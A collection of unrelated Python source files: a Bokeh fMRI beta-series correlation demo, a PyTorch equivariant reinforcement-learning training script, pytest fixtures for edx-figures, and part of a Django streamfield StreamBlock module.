    for idx, (onsets, betas, toggle, source) in enumerate(zip([onsets_a, onsets_b],
                                                              [betas_a, betas_b],
                                                              [beta_a_toggle, beta_b_toggle],
                                                              [source_la, source_lb])):
        # NOTE(review): y0s/y1s multiply a scalar by len(onsets), yielding a
        # single scaled scalar rather than one value per onset — presumably
        # [y0] * len(onsets) was intended; confirm against the segment glyph.
        y0s = y0 * len(onsets)
        y1s = y1 * len(onsets)
        lbls = LabelSet(x='onsets', y=0.35,
                        text=beta_key, source=source,
                        text_color=Dark2[3][idx+1])
        plot.add_layout(lbls)
        # the toggle shows/hides the beta labels client-side (no server call)
        toggle.js_link('active', lbls, 'visible')
        plot.segment(x0=onsets, x1=onsets, y0=y0s, y1=y1s,
                     color=Dark2[3][idx+1], line_width=4)
# set up plots for correlations: region-1 betas vs region-2 betas,
# one point per trial, for each trial type
plot_a = figure(plot_height=400, plot_width=400, title="Beta Series Correlation: A",
                tools="crosshair,reset,hover,save,wheel_zoom")
plot_b = figure(plot_height=400, plot_width=400, title="Beta Series Correlation: B",
                tools="crosshair,reset,hover,save,wheel_zoom")
plot_a.scatter(x='betas_r1', y='betas_r2', fill_color=Dark2[3][1],
               source=source_la, line_color=None, size=15)
plot_b.scatter(x='betas_r1', y='betas_r2', fill_color=Dark2[3][2],
               source=source_lb, line_color=None, size=15)
plot_a.yaxis.axis_label = "Region 2"
plot_a.xaxis.axis_label = "Region 1"
plot_b.yaxis.axis_label = "Region 2"
plot_b.xaxis.axis_label = "Region 1"
def update(attrname, old, new):
    """Slider callback: re-simulate both conditions and patch the
    ColumnDataSources in place (bokeh redraws the glyphs automatically).

    The (attrname, old, new) signature is required by bokeh's on_change.
    """
    # values for condition A
    _, betas_a, region_1a, region_2a = generate_2voxels_signal(
        corr=corr_a_widget.value, timepoints=timepoints)
    # values for condition B
    _, betas_b, region_1b, region_2b = generate_2voxels_signal(
        corr=corr_b_widget.value, timepoints=timepoints, onset_offset=4)
    # full signal
    region_1_list = [region_1a, region_1b]
    region_2_list = [region_2a, region_2b]
    # optionally add AR(1) noise to each region before summing
    if noise_widget.value > 0:
        region_1_noise = generate_noise(timepoints=timepoints, scale=noise_widget.value)
        region_2_noise = generate_noise(timepoints=timepoints, scale=noise_widget.value)
        region_1_list.append(region_1_noise)
        region_2_list.append(region_2_noise)
    Y_region_1 = add_components(region_1_list)
    Y_region_2 = add_components(region_2_list)
    betas_a_rnd = np.round(betas_a, 2)
    betas_b_rnd = np.round(betas_b, 2)
    # patch() replaces whole column slices in the existing sources
    s = slice(0, len(source_r1.data['Y']))
    source_r1.patch({"Y": [(s, Y_region_1)],
                     "A": [(s, region_1a)],
                     "B": [(s, region_1b)]
                     })
    source_r2.patch({"Y": [(s, Y_region_2)],
                     "A": [(s, region_2a)],
                     "B": [(s, region_2b)]
                     })
    s2 = slice(0, len(source_la.data['onsets']))
    source_la.patch({"betas_r1": [(s2, betas_a_rnd[:, 0])],
                     "betas_r2": [(s2, betas_a_rnd[:, 1])]
                     })
    s3 = slice(0, len(source_lb.data['onsets']))
    source_lb.patch({"betas_r1": [(s3, betas_b_rnd[:, 0])],
                     "betas_r2": [(s3, betas_b_rnd[:, 1])]
                     })
    # refresh the on-plot correlation readouts
    trial_type_a_corr.text = 'Trial Type A Correlation: {corr}'.format(corr=corr_a_widget.value)
    trial_type_b_corr.text = 'Trial Type B Correlation: {corr}'.format(corr=corr_b_widget.value)
# wire every slider (skip the Div title at index 0) to the callback
for w in widgets[1:]:
    w.on_change('value', update)
data_inputs = column(widgets)
curdoc().add_root(grid([[plot_r1], [plot_r2, [beta_a_toggle, beta_b_toggle]], [plot_a, plot_b], [data_inputs]]))
curdoc().title = "My Awesome Task"
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import utils
from logger import Logger
from replay_buffer import ReplayBufferStorage, make_replay_loader
from video import TrainVideoRecorder, VideoRecorder
from collections import OrderedDict
import dmc
import warnings
from copy import deepcopy
from pathlib import Path
import hydra
import numpy as np
import torch
from torch import nn
import e2cnn.nn as enn
from e2cnn import gspaces
from dm_env import specs
import os
# Render MuJoCo headlessly through EGL (no X server required).
os.environ['MUJOCO_GL'] = 'egl'
warnings.filterwarnings('ignore', category=DeprecationWarning)
# Force the Intel MKL threading layer to avoid service conflicts.
os.environ['MKL_SERVICE_FORCE_INTEL'] = '1'
# Input sizes are fixed, so let cuDNN autotune convolution algorithms.
torch.backends.cudnn.benchmark = True
# group action acting on all networks
g = gspaces.Flip2dOnR2()
def enc_net(obs_shape, act, load_weights):
    """Build the group-equivariant convolutional image encoder.

    Parameters
    ----------
    obs_shape: observation shape; obs_shape[0] is the input channel count.
    act: e2cnn gspace whose group action the layers are equivariant to.
    load_weights: restore weights from 'encWeights.pt' in the cwd
        (e2cnn modules are unpicklable, so weights are saved separately).

    Returns
    -------
    (net, 1024): the encoder and its flat output dimension.

    The `# NxN` comments annotate spatial sizes — presumably for 84x84
    input frames (the DMC default); confirm against the env config.
    """
    n_out = 128
    chan_up = n_out // 6
    net = nn.Sequential(
        # 84x84
        enn.R2Conv(enn.FieldType(act, obs_shape[0] * [act.trivial_repr]),
                   enn.FieldType(act, chan_up*1 *
                                 [act.regular_repr]),
                   kernel_size=3, padding=1),
        enn.ReLU(enn.FieldType(act, chan_up*1 *
                               [act.regular_repr]), inplace=True),
        enn.PointwiseMaxPool(enn.FieldType(
            act, chan_up*1 * [act.regular_repr]), 2),
        # 42x42
        enn.R2Conv(enn.FieldType(act, chan_up*1 * [act.regular_repr]),
                   enn.FieldType(act, chan_up*2 *
                                 [act.regular_repr]),
                   kernel_size=3, padding=0),
        enn.ReLU(enn.FieldType(act, chan_up*2 *
                               [act.regular_repr]), inplace=True),
        enn.PointwiseMaxPool(enn.FieldType(
            act, chan_up*2 * [act.regular_repr]), 2),
        # 20x20
        enn.R2Conv(enn.FieldType(act, chan_up*2 * [act.regular_repr]),
                   enn.FieldType(act, chan_up*3 *
                                 [act.regular_repr]),
                   kernel_size=3, padding=1),
        enn.ReLU(enn.FieldType(act, chan_up*3 *
                               [act.regular_repr]), inplace=True),
        enn.PointwiseMaxPool(enn.FieldType(
            act, chan_up*3 * [act.regular_repr]), 2),
        # 10x10
        enn.R2Conv(enn.FieldType(act, chan_up*3 * [act.regular_repr]),
                   enn.FieldType(act, chan_up*4 *
                                 [act.regular_repr]),
                   kernel_size=3, padding=1),
        enn.ReLU(enn.FieldType(act, chan_up*4 *
                               [act.regular_repr]), inplace=True),
        enn.PointwiseMaxPool(enn.FieldType(
            act, chan_up*4 * [act.regular_repr]), 2),
        # 5x5
        enn.R2Conv(enn.FieldType(act, chan_up*4 * [act.regular_repr]),
                   enn.FieldType(act, chan_up*5 *
                                 [act.regular_repr]),
                   kernel_size=3, padding=0),
        enn.ReLU(enn.FieldType(act, chan_up*5 *
                               [act.regular_repr]), inplace=True),
        # 3x3
        enn.R2Conv(enn.FieldType(act, chan_up*5 * [act.regular_repr]),
                   enn.FieldType(act, n_out *
                                 [act.regular_repr]),
                   kernel_size=3, padding=0),
        enn.ReLU(enn.FieldType(act, n_out *
                               [act.regular_repr]), inplace=True),
        # 1x1: final projection onto irrep(1) fields gives the flat feature
        enn.R2Conv(enn.FieldType(act, n_out * [act.regular_repr]),
                   enn.FieldType(act, 1024 * \
                                 [act.irrep(1)]),
                   kernel_size=1)
    )
    if load_weights:
        dict_init = torch.load(os.path.join(Path.cwd(), 'encWeights.pt'))
        net.load_state_dict(dict_init)
    return net, 1024
def act_net(repr_dim, act, load_weights):
    """Build the actor MLP head on top of the encoder representation.

    Parameters
    ----------
    repr_dim: size of the flattened encoder output.
    act: gspace argument, unused here (the head is a plain MLP); kept for
        signature parity with enc_net/crit_net.
    load_weights: restore weights from 'actWeights.pt' in the cwd.
    """
    # hardcoded from cfg to test backing up to only equi encoder
    feature_dim = 50
    hidden_dim = 1024
    layers = [
        nn.Linear(repr_dim, feature_dim),
        nn.LayerNorm(feature_dim),
        nn.Tanh(),
        nn.Linear(feature_dim, hidden_dim),
        nn.ReLU(inplace=True),
        nn.Linear(hidden_dim, hidden_dim),
        nn.ReLU(inplace=True),
        nn.Linear(hidden_dim, 1),
    ]
    net = nn.Sequential(*layers)
    if load_weights:
        net.load_state_dict(torch.load(os.path.join(Path.cwd(), 'actWeights.pt')))
    return net
def crit_net(repr_dim, action_shape, act, load_weights, target):
    """Build the twin Q-value heads and their shared feature trunk.

    Parameters
    ----------
    repr_dim: size of the flattened encoder output fed to the trunk.
    action_shape: action spec shape; action_shape[0] is the action dim.
    act: gspace argument, unused here (plain MLPs); kept for signature
        parity with enc_net.
    load_weights: restore weights from the cwd checkpoint files.
    target: select the target-critic checkpoint names when loading.

    Returns
    -------
    (net1, net2, trunk): the two Q heads and the shared trunk.
    """
    hidden_dim = 1024
    feature_dim = 50

    def _q_head():
        # one Q head: (trunk features ++ action) -> scalar value
        return nn.Sequential(
            nn.Linear(feature_dim + action_shape[0], hidden_dim),
            nn.ReLU(inplace=True),
            nn.Linear(hidden_dim, hidden_dim),
            nn.ReLU(inplace=True),
            nn.Linear(hidden_dim, 1),
        )

    net1 = _q_head()
    net2 = _q_head()
    trunk = nn.Sequential(
        nn.Linear(repr_dim, feature_dim),
        nn.LayerNorm(feature_dim),
        nn.Tanh(),
    )
    if load_weights:
        if target:
            names = ('critTargWeights1.pt', 'critTargWeights2.pt', 'critTargWeightsTrunk.pt')
        else:
            names = ('critWeights1.pt', 'critWeights2.pt', 'critWeightsTrunk.pt')
        cwd = Path.cwd()
        net1.load_state_dict(torch.load(os.path.join(cwd, names[0])))
        net2.load_state_dict(torch.load(os.path.join(cwd, names[1])))
        trunk.load_state_dict(torch.load(os.path.join(cwd, names[2])))
    return net1, net2, trunk
def make_agent(obs_spec, action_spec, cfg):
    """Instantiate the hydra-configured agent and inject the networks.

    The e2cnn modules are unpicklable, so the networks are built here
    (outside the agent's own constructor) and wired in via set_networks.
    """
    global g
    cfg.obs_shape = obs_spec.shape
    cfg.action_shape = action_spec.shape
    agent = hydra.utils.instantiate(cfg)
    # don't load weights because we're not loading from pickle, instead initialize
    enc, repr_dim = enc_net(cfg.obs_shape, g, load_weights=False)
    act = act_net(repr_dim, g, load_weights=False)
    q1, q2, trunk = crit_net(
        repr_dim, cfg.action_shape, g, load_weights=False, target=False)
    qt1, qt2, trunkT = crit_net(
        repr_dim, cfg.action_shape, g, load_weights=False, target=True)
    # set networks in agent
    agent.set_networks(g, repr_dim, enc, act, q1, q2, qt1, qt2, trunk, trunkT)
    agent.encoder.apply(utils.weight_init)
    agent.actor.apply(utils.weight_init)
    agent.critic.apply(utils.weight_init)
    agent.critic_target.apply(utils.weight_init)
    agent.encoder.to('cuda')
    agent.actor.to('cuda')
    agent.critic.to('cuda')
    agent.critic_target.to('cuda')
    # target critic starts as an exact copy of the online critic
    agent.critic_target.load_state_dict(agent.critic.state_dict())
    agent.encoder_opt = torch.optim.Adam(agent.encoder.parameters(), lr=cfg.lr)
    agent.actor_opt = torch.optim.Adam(agent.actor.parameters(), lr=cfg.lr)
    agent.critic_opt = torch.optim.Adam(agent.critic.parameters(), lr=cfg.lr)
    agent.train()
    agent.critic_target.train()
    return agent
class Workspace:
def __init__(self, cfg):
    """Create working dir, envs, agent and training bookkeeping state."""
    self.work_dir = Path.cwd()
    print(f'workspace: {self.work_dir}')
    self.cfg = cfg
    utils.set_seed_everywhere(cfg.seed)
    self.device = torch.device(cfg.device)
    self.setup()
    self.agent = make_agent(self.train_env.observation_spec(),
                            self.train_env.action_spec(),
                            self.cfg.agent)
    self.timer = utils.Timer()
    # counters exposed through the global_step/global_episode properties
    self._global_step = 0
    self._global_episode = 0
    # files to save e2cnn network weights because they're unpicklable
    self.enc_weight_dir = "encWeights.pt"
    self.actor_weight_dir = "actWeights.pt"
    self.critic_weight_dir1 = "critWeights1.pt"
    self.critic_weight_dir2 = "critWeights2.pt"
    self.criticT_weight_dir1 = "critTargWeights1.pt"
    self.criticT_weight_dir2 = "critTargWeights2.pt"
    self.critic_weight_dirTrunk = "critWeightsTrunk.pt"
    self.critic_weight_dirTrunkT = "critTargWeightsTrunk.pt"
def setup(self):
    """Create the logger, train/eval envs, replay buffer and recorders."""
    # create logger
    self.logger = Logger(self.work_dir, use_tb=self.cfg.use_tb)
    # create envs (same seed for train and eval)
    self.train_env = dmc.make(self.cfg.task_name, self.cfg.frame_stack,
                              self.cfg.action_repeat, self.cfg.seed)
    self.eval_env = dmc.make(self.cfg.task_name, self.cfg.frame_stack,
                             self.cfg.action_repeat, self.cfg.seed)
    # create replay buffer
    data_specs = (self.train_env.observation_spec(),
                  self.train_env.action_spec(),
                  specs.Array((1,), np.float32, 'reward'),
                  specs.Array((1,), np.float32, 'discount'))
    self.replay_storage = ReplayBufferStorage(data_specs,
                                              self.work_dir / 'buffer')
    self.replay_loader = make_replay_loader(
        self.work_dir / 'buffer', self.cfg.replay_buffer_size,
        self.cfg.batch_size, self.cfg.replay_buffer_num_workers,
        self.cfg.save_snapshot, self.cfg.nstep, self.cfg.discount)
    # the loader iterator is created lazily by the replay_iter property
    self._replay_iter = None
    self.video_recorder = VideoRecorder(
        self.work_dir if self.cfg.save_video else None)
    self.train_video_recorder = TrainVideoRecorder(
        self.work_dir if self.cfg.save_train_video else None)
@property
def global_step(self):
return self._global_step
@property
def global_episode(self):
return self._global_episode
@property
def global_frame(self):
return self.global_step * self.cfg.action_repeat
@property
def replay_iter(self):
if self._replay_iter is None:
self._replay_iter = iter(self.replay_loader)
return self._replay_iter
def eval(self):
step, episode, total_reward = 0, 0, 0
eval_until_episode = utils.Until(self.cfg.num_eval_episodes)
while eval_until_episode(episode):
time_step = self.eval_env.reset()
self.video_recorder.init(self.eval_env, enabled=(episode == 0))
while not time_step.last():
with torch.no_grad(), utils.eval_mode(self.agent):
action = self.agent.act(time_step.observation,
self.global_step,
eval_mode=True)
time_step = self.eval_env.step(action)
self.video_recorder.record(self.eval_env)
total_reward += time_step.reward
step += 1
episode += 1
self.video_recorder.save(f'{self.global_frame}.mp4')
with self.logger.log_and_dump_ctx(self.global_frame, ty='eval') as log:
log('episode_reward', total_reward / episode)
log('episode_length', step * self.cfg.action_repeat / episode)
log('episode', self.global_episode)
log('step', self.global_step)
def train(self):
# predicates
train_until_step = utils.Until(self.cfg.num_train_frames,
self.cfg.action_repeat)
seed_until_step = utils.Until(self.cfg.num_seed_frames,
self.cfg.action_repeat)
eval_every_step = utils.Every(self.cfg.eval_every_frames,
self.cfg.action_repeat)
episode_step, episode_reward = 0, 0
time_step = self.train_env.reset()
self.replay_storage.add(time_step)
self.train_video_recorder.init(time_step.observation)
metrics = None
while train_until_step(self.global_step):
if time_step.last():
self._global_episode += 1
if self.global_frame % 100000 == 0:
# save vid every 100k frames instead of every 10k
self.train_video_recorder.save(f'{self.global_frame}.mp4')
# wait until all the metrics schema is populated
if metrics is not None:
# log stats
elapsed_time, total_time = self.timer.reset()
episode_frame = episode_step * self.cfg.action_repeat
with self.logger.log_and_dump_ctx(self.global_frame,
ty='train') as log:
log('fps', episode_frame / elapsed_time)
log('total_time', total_time)
log('episode_reward', episode_reward)
log('episode_length', episode_frame)
log('episode', self.global_episode)
log('buffer_size', len(self.replay_storage))
log('step', self.global_step)
# reset env
time_step = self.train_env.reset()
self.replay_storage.add(time_step)
self.train_video_recorder.init(time_step.observation)
# try to save snapshot
if self.cfg.save_snapshot:
self.save_snapshot()
episode_step = 0
episode_reward = 0
# try to evaluate
if eval_every_step(self.global_step):
self.logger.log('eval_total_time', self.timer.total_time(),
self.global_frame)
self.eval()
# sample action
with torch.no_grad(), utils.eval_mode(self.agent):
action = self.agent.act(time_step.observation,
self.global_step,
eval_mode=False)
# try to update the agent
if not seed_until_step(self.global_step):
metrics = self.agent.update(self.replay_iter, self.global_step)
self.logger.log_metrics(metrics, self.global_frame, ty='train')
# take env step
time_step = self.train_env.step(action)
episode_reward += time_step.reward
self.replay_storage.add(time_step)
self.train_video_recorder.record(time_step.observation)
episode_step += 1
self._global_step += 1
def save_snapshot(self):
snapshot = self.work_dir / 'snapshot.pt'
keys_to_save = ['agent', 'timer', '_global_step', '_global_episode']
payload = {k: self.__dict__[k] for k in keys_to_save}
with snapshot.open('wb') as f:
torch.save(payload, f)
self.agent.save_enc(self.enc_weight_dir)
self.agent.save_actor(self.actor_weight_dir)
self.agent.save_critic(self.critic_weight_dir1, self.critic_weight_dir2,
self.criticT_weight_dir1, self.criticT_weight_dir2,
self.critic_weight_dirTrunk, self.critic_weight_dirTrunkT)
def load_snapshot(self):
global g
snapshot = self.work_dir / 'snapshot.pt'
with snapshot.open('rb') as f:
payload = torch.load(f)
for k, v in payload.items():
self.__dict__[k] = v
# load weights from pickle state dict
obs_shape = self.train_env.observation_spec().shape
action_shape = self.train_env.action_spec().shape
enc, repr_dim = enc_net(obs_shape, g, load_weights=True)
act = act_net(repr_dim, g, load_weights=True)
q1, q2, trunk = crit_net(
repr_dim, action_shape, g, load_weights=True, target=False)
qt1, qt2, trunkT = crit_net(
repr_dim, action_shape, g, load_weights=True, target=True)
self.agent.set_networks(g, repr_dim, enc, act,
q1, q2, qt1, qt2, trunk, trunkT)
self.agent.encoder.to(self.device)
self.agent.actor.to(self.device)
self.agent.critic.to(self.device)
self.agent.critic_target.to(self.device)
@hydra.main(config_path='cfgs', config_name='config')
def main(cfg):
    """Hydra entry point: build a Workspace and train, resuming from an
    existing snapshot.pt in the run directory if one is present."""
    # import here so hydra can re-instantiate the class from the run dir
    from train import Workspace as W
    root_dir = Path.cwd()
    print('root:', root_dir)
    ws = W(cfg)
    snapshot = root_dir / 'snapshot.pt'
    if snapshot.exists():
        print(f'resuming: {snapshot}')
        ws.load_snapshot()
    ws.train()


if __name__ == '__main__':
    main()
|
<reponame>appsembler/edx-figures<filename>tests/conftest.py<gh_stars>0
from __future__ import absolute_import
from datetime import datetime
import pytest
from django.utils.timezone import utc
from six.moves import range
from tests.helpers import organizations_support_sites
from tests.factories import (
CourseEnrollmentFactory,
CourseOverviewFactory,
OrganizationFactory,
OrganizationCourseFactory,
StudentModuleFactory,
SiteFactory,
UserFactory,
)
if organizations_support_sites():
from tests.factories import UserOrganizationMappingFactory
def map_users_to_org(org, users):
[UserOrganizationMappingFactory(user=user,
organization=org) for user in users]
@pytest.fixture
@pytest.mark.django_db
def sm_test_data(db):
    """
    WIP StudentModule test data to test MAU

    Creates three courses with one StudentModule each (October 2019), plus a
    site and an organization; on multisite installs the org is linked to the
    site, the courses, and each student-module's user.
    """
    year_for = 2019
    month_for = 10
    created_date = datetime(year_for, month_for, 1).replace(tzinfo=utc)
    modified_date = datetime(year_for, month_for, 10).replace(tzinfo=utc)
    course_overviews = [CourseOverviewFactory() for i in range(3)]
    site = SiteFactory()
    # One StudentModule per course. The previous version ran the same
    # comprehension once per outer-loop iteration over the same list
    # (shadowing `co`), creating n*n duplicate records instead of n.
    sm = [StudentModuleFactory(course_id=co.id,
                               created=created_date,
                               modified=modified_date)
          for co in course_overviews]
    if organizations_support_sites():
        org = OrganizationFactory(sites=[site])
        for co in course_overviews:
            OrganizationCourseFactory(organization=org, course_id=str(co.id))
        for rec in sm:
            UserOrganizationMappingFactory(user=rec.student, organization=org)
    else:
        org = OrganizationFactory()
    return dict(site=site,
                organization=org,
                course_overviews=course_overviews,
                student_modules=sm,
                year_for=year_for,
                month_for=month_for)
@pytest.mark.django_db
def make_site_data(num_users=3, num_courses=2, create_enrollments=True):
    """Build a site plus org, courses, users and (optionally) enrollments.

    User ``i`` gets ``i`` enrollments, so user0 has none and the last user has
    ``num_users - 1``. Returns a dict with keys ``site``, ``org``, ``courses``,
    ``users`` and ``enrollments`` (empty list when create_enrollments=False).
    """
    site = SiteFactory()
    if organizations_support_sites():
        org = OrganizationFactory(sites=[site])
    else:
        org = OrganizationFactory()
    courses = [CourseOverviewFactory() for i in range(num_courses)]
    # Build the user list exactly once. The previous version created it twice,
    # leaving an unused, unmapped batch of users polluting the test database.
    users = [UserFactory() for i in range(num_users)]
    enrollments = []
    if create_enrollments:
        for i, user in enumerate(users):
            # Create increasing number of enrollments for each user, maximum to one less
            # than the number of courses
            for j in range(i):
                # NOTE(review): courses[j-1] selects the *last* course first
                # (j == 0 -> index -1); possibly intended to be courses[j].
                # Preserved as-is — confirm against the consuming tests.
                enrollments.append(
                    CourseEnrollmentFactory(course=courses[j-1], user=user)
                )
    if organizations_support_sites():
        for course in courses:
            OrganizationCourseFactory(organization=org,
                                      course_id=str(course.id))
        # Set up user mappings
        map_users_to_org(org, users)
    # `enrollments` is already [] when create_enrollments is False, so a
    # second conditional assignment into the dict is unnecessary.
    return dict(
        site=site,
        org=org,
        courses=courses,
        users=users,
        enrollments=enrollments,
    )
@pytest.fixture
@pytest.mark.django_db
def lm_test_data(db, settings):
    """Learner Metrics Test Data
    user0 not enrolled in any courses
    user1 enrolled in 1 course
    user2 enrolled in 2 courses
    """
    # On multisite installs, flip the feature flag before creating data.
    if organizations_support_sites():
        settings.FEATURES['FIGURES_IS_MULTISITE'] = True
    # Two independent sites: "us" is the site under test, "them" is noise
    # that site-scoped queries must not leak.
    return dict(us=make_site_data(), them=make_site_data())
|
import uuid
from collections import OrderedDict, defaultdict
from collections.abc import Sequence
from uuid import uuid4
from django import forms
from django.core.exceptions import NON_FIELD_ERRORS, ValidationError
from django.forms.utils import ErrorList
from django.utils.functional import cached_property
from django.utils.html import format_html_join
from django.utils.translation import ugettext as _
from ..exceptions import RemovedError
from ..widgets import BlockData
from .base import Block, BoundBlock, DeclarativeSubBlocksMetaclass
__all__ = [
"BaseStreamBlock",
"StreamBlock",
"StreamValue",
"StreamBlockValidationError",
]
class StreamBlockValidationError(ValidationError):
    """Aggregate validation error for a stream: per-child errors keyed by
    stream index, plus stream-level errors stored under NON_FIELD_ERRORS."""

    def __init__(self, block_errors=None, non_block_errors=None):
        merged = dict(block_errors) if block_errors else {}
        if non_block_errors:
            merged[NON_FIELD_ERRORS] = non_block_errors
        super().__init__("Validation error in StreamBlock", params=merged)
class BaseStreamBlock(Block):
    """A block holding an ordered, heterogeneous sequence of child blocks.

    Child blocks come from `base_blocks` (declared on subclasses) plus any
    `local_blocks` passed to the constructor; values are represented as
    StreamValue instances.
    """

    def __init__(self, local_blocks=None, **kwargs):
        # kept so deconstruct() can reproduce the constructor call in migrations
        self._constructor_kwargs = kwargs
        super().__init__(**kwargs)
        # create a local (shallow) copy of base_blocks so that it can be supplemented by local_blocks
        self.child_blocks = self.base_blocks.copy()
        if local_blocks:
            for name, block in local_blocks:
                block.set_name(name)
                self.child_blocks[name] = block
        self.dependencies = self.child_blocks.values()

    @cached_property
    def definition(self):
        """Client-side definition: parent definition plus child definitions
        and the min/max item counts."""
        definition = super(BaseStreamBlock, self).definition
        definition.update(
            children=[
                child_block.definition for child_block in self.child_blocks.values()
            ],
            minNum=self.meta.min_num,
            maxNum=self.meta.max_num,
        )
        html = self.get_instance_html([])
        if html is not None:
            definition["html"] = html
        return definition

    def get_default(self):
        """
        Default values set on a StreamBlock should be a list of (type_name, value) tuples -
        we can't use StreamValue directly, because that would require a reference back to
        the StreamBlock that hasn't been built yet.
        For consistency, then, we need to convert it to a StreamValue here for StreamBlock
        to work with.
        """
        return StreamValue(self, self.meta.default)

    def sorted_child_blocks(self):
        # removed from the ancestor API; calling it is an error
        raise RemovedError

    def render_list_member(self, *args, **kwargs):
        raise RemovedError

    def html_declarations(self):
        raise RemovedError

    @property
    def media(self):
        # JS assets needed by the client-side stream editor
        return forms.Media(
            js=[
                "django_react_streamfield/js/blocks/sequence.js",
                "django_react_streamfield/js/blocks/stream.js",
            ]
        )

    def js_initializer(self):
        raise RemovedError

    def render_form(self, *args, **kwargs):
        raise RemovedError

    def value_from_datadict(self, data, files, prefix):
        """Build a StreamValue from submitted form data, delegating each
        child's value to the matching child block; unknown types are skipped
        and missing ids are replaced with fresh uuid4 strings."""
        return StreamValue(
            self,
            [
                (
                    child_block_data["type"],
                    self.child_blocks[child_block_data["type"]].value_from_datadict(
                        child_block_data, files, prefix,
                    ),
                    child_block_data.get("id", str(uuid4())),
                )
                for child_block_data in data["value"]
                if child_block_data["type"] in self.child_blocks
            ],
        )

    def get_definition(self):
        """Like `definition`, but built via get_definition()/get_blocks_container_html()."""
        definition = super(BaseStreamBlock, self).get_definition()
        definition.update(
            children=[
                child_block.get_definition()
                for child_block in self.child_blocks.values()
            ],
            minNum=self.meta.min_num,
            maxNum=self.meta.max_num,
        )
        html = self.get_blocks_container_html()
        if html is not None:
            definition["html"] = html
        return definition

    def prepare_value(self, value, errors=None):
        """Convert a StreamValue into a list of BlockData dicts for the
        client editor, attaching per-child errors where present."""
        if value is None:
            return []
        children_errors = self.get_children_errors(errors)
        if children_errors is None:
            children_errors = {}
        prepared_value = []
        for i, stream_child in enumerate(value):
            child_errors = children_errors.get(i)
            child_block = stream_child.block
            child_value = stream_child.value
            html = child_block.get_instance_html(child_value, errors=child_errors)
            child_value = BlockData(
                {
                    "id": stream_child.id or str(uuid4()),
                    "type": child_block.name,
                    "hasError": bool(child_errors),
                    "value": child_block.prepare_value(
                        child_value, errors=child_errors
                    ),
                }
            )
            if html is not None:
                child_value["html"] = html
            prepared_value.append(child_value)
        return prepared_value

    def value_omitted_from_data(self, data, files, prefix):
        return data.get("value") is None

    @property
    def required(self):
        return self.meta.required

    def clean(self, value):
        """Clean each child and enforce required/min_num/max_num/block_counts;
        raises StreamBlockValidationError aggregating all failures."""
        cleaned_data = []
        errors = {}
        non_block_errors = ErrorList()
        for i, child in enumerate(value):  # child is a StreamChild instance
            try:
                cleaned_data.append(
                    (child.block.name, child.block.clean(child.value), child.id)
                )
            except ValidationError as e:
                errors[i] = ErrorList([e])

        if self.meta.min_num is not None and self.meta.min_num > len(value):
            non_block_errors.append(
                ValidationError(
                    _("The minimum number of items is %d") % self.meta.min_num
                )
            )
        elif self.required and len(value) == 0:
            non_block_errors.append(ValidationError(_("This field is required.")))

        if self.meta.max_num is not None and self.meta.max_num < len(value):
            non_block_errors.append(
                ValidationError(
                    _("The maximum number of items is %d") % self.meta.max_num
                )
            )

        if self.meta.block_counts:
            # per-block-type min/max constraints
            block_counts = defaultdict(int)
            for item in value:
                block_counts[item.block_type] += 1
            for block_name, min_max in self.meta.block_counts.items():
                block = self.child_blocks[block_name]
                max_num = min_max.get("max_num", None)
                min_num = min_max.get("min_num", None)
                block_count = block_counts[block_name]
                if min_num is not None and min_num > block_count:
                    non_block_errors.append(
                        ValidationError(
                            "{}: {}".format(
                                block.label,
                                _("The minimum number of items is %d") % min_num,
                            )
                        )
                    )
                if max_num is not None and max_num < block_count:
                    non_block_errors.append(
                        ValidationError(
                            "{}: {}".format(
                                block.label,
                                _("The maximum number of items is %d") % max_num,
                            )
                        )
                    )

        if errors or non_block_errors:
            # The message here is arbitrary - outputting error messages is delegated to the child blocks,
            # which only involves the 'params' list
            raise StreamBlockValidationError(
                block_errors=errors, non_block_errors=non_block_errors
            )

        return StreamValue(self, cleaned_data)

    def to_python(self, value):
        # the incoming JSONish representation is a list of dicts, each with a 'type' and 'value' field
        # (and possibly an 'id' too).
        # This is passed to StreamValue to be expanded lazily - but first we reject any unrecognised
        # block types from the list
        return StreamValue(
            self,
            [
                child_data
                for child_data in value
                if child_data["type"] in self.child_blocks
            ],
            is_lazy=True,
        )

    def get_prep_value(self, value):
        if not value:
            # Falsy values (including None, empty string, empty list, and
            # empty StreamValue) become an empty stream
            return []
        else:
            # value is a StreamValue - delegate to its get_prep_value() method
            # (which has special-case handling for lazy StreamValues to avoid useless
            # round-trips to the full data representation and back)
            return value.get_prep_value()

    def get_api_representation(self, value, context=None):
        """Serialize for the API: a list of {type, value, id} dicts."""
        if value is None:
            # treat None as identical to an empty stream
            return []
        return [
            {
                "type": child.block.name,
                "value": child.block.get_api_representation(
                    child.value, context=context
                ),
                "id": child.id,
            }
            for child in value  # child is a StreamChild instance
        ]

    def render_basic(self, value, context=None):
        # default front-end rendering: one wrapper div per child, CSS-classed
        # by block type
        return format_html_join(
            "\n",
            '<div class="block-{1}">{0}</div>',
            [(child.render(context=context), child.block_type) for child in value],
        )

    def get_searchable_content(self, value):
        """Concatenate the searchable content of every child."""
        content = []
        for child in value:
            content.extend(child.block.get_searchable_content(child.value))
        return content

    def deconstruct(self):
        """
        Always deconstruct StreamBlock instances as if they were plain StreamBlocks with all of the
        field definitions passed to the constructor - even if in reality this is a subclass of StreamBlock
        with the fields defined declaratively, or some combination of the two.
        This ensures that the field definitions get frozen into migrations, rather than leaving a reference
        to a custom subclass in the user's models.py that may or may not stick around.
        """
        path = "django_react_streamfield.blocks.StreamBlock"
        args = [list(self.child_blocks.items())]
        kwargs = self._constructor_kwargs
        return (path, args, kwargs)

    def check(self, **kwargs):
        """Run Django system checks on this block and all child blocks."""
        errors = super().check(**kwargs)
        for name, child_block in self.child_blocks.items():
            errors.extend(child_block.check(**kwargs))
            errors.extend(child_block._check_name(**kwargs))
        return errors

    class Meta:
        # No icon specified here, because that depends on the purpose that the
        # block is being used for. Feel encouraged to specify an icon in your
        # descendant block type
        icon = "placeholder"
        default = []
        required = True
        min_num = None
        max_num = None
        block_counts = {}
class StreamBlock(BaseStreamBlock, metaclass=DeclarativeSubBlocksMetaclass):
    # Concrete stream block. DeclarativeSubBlocksMetaclass gathers child
    # blocks declared as class attributes into `base_blocks`, which
    # BaseStreamBlock.__init__ then copies into `child_blocks`.
    pass
class StreamValue(Sequence):
    """
    Custom type used to represent the value of a StreamBlock; behaves as a sequence of BoundBlocks
    (which keep track of block types in a way that the values alone wouldn't).
    """

    class StreamChild(BoundBlock):
        """
